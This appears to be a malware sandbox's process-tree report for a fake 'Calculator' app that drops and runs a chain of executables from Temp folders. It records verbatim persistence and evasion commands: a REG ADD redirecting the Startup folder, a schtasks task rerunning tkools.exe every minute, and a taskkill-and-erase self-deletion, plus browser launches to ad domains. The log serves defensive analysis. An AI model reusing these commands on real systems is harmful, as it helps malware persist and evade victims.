C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ffcbb22dec0,0x7ffcbb22ded0,0x7ffcbb22dee09⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1608 /prefetch:29⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=1760 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2400 /prefetch:19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=2180 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2524 /prefetch:19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=2492 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3188 /prefetch:29⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=3680 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=2636 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=1560 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1596,8187874568879809337,15818869623981275409,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15168_57630775" --mojo-platform-channel-handle=1480 /prefetch:89⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1682c535a6fcb6e7.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1682c535a6fcb6e7.exeSat1682c535a6fcb6e7.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1612020d5c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1612020d5c.exeSat1612020d5c.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\7⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\8⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat163b771375.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat163b771375.exeSat163b771375.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat163b771375.exe"C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat163b771375.exe" -u6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16066e28b50208.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16066e28b50208.exeSat16066e28b50208.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16066e28b50208.exeC:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16066e28b50208.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1624bfc23ff9f.exe /mixtwo4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1624bfc23ff9f.exeSat1624bfc23ff9f.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1624bfc23ff9f.exeSat1624bfc23ff9f.exe /mixtwo6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat1624bfc23ff9f.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1624bfc23ff9f.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sat1624bfc23ff9f.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat160ff2e199851.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat160ff2e199851.exeSat160ff2e199851.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 18606⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16156abf9c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16156abf9c.exeSat16156abf9c.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 2846⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1637cdb9d96.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1637cdb9d96.exeSat1637cdb9d96.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\AhWVemGiKw7SpgUWHHpZkjyt.exe"C:\Users\Admin\Pictures\Adobe Films\AhWVemGiKw7SpgUWHHpZkjyt.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16af470129.exe4⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe fcb5a9b066a67e58a6b11c76f5aa06e9 PoCBdPX16U6ODzUp3gO8FQ.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16af470129.exeSat16af470129.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-L6HEG.tmp\Sat16af470129.tmp"C:\Users\Admin\AppData\Local\Temp\is-L6HEG.tmp\Sat16af470129.tmp" /SL5="$20162,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16af470129.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-3J62J.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-3J62J.tmp\lakazet.exe" /S /UID=27203⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\ff-a24a0-33b-f8a9b-2ef30998056b6\Bovikunipu.exe"C:\Users\Admin\AppData\Local\Temp\ff-a24a0-33b-f8a9b-2ef30998056b6\Bovikunipu.exe"4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a347186⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:36⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5836 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5836 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4692 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,4399242953350654996,7884727412299237087,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a347186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514835⤵
-
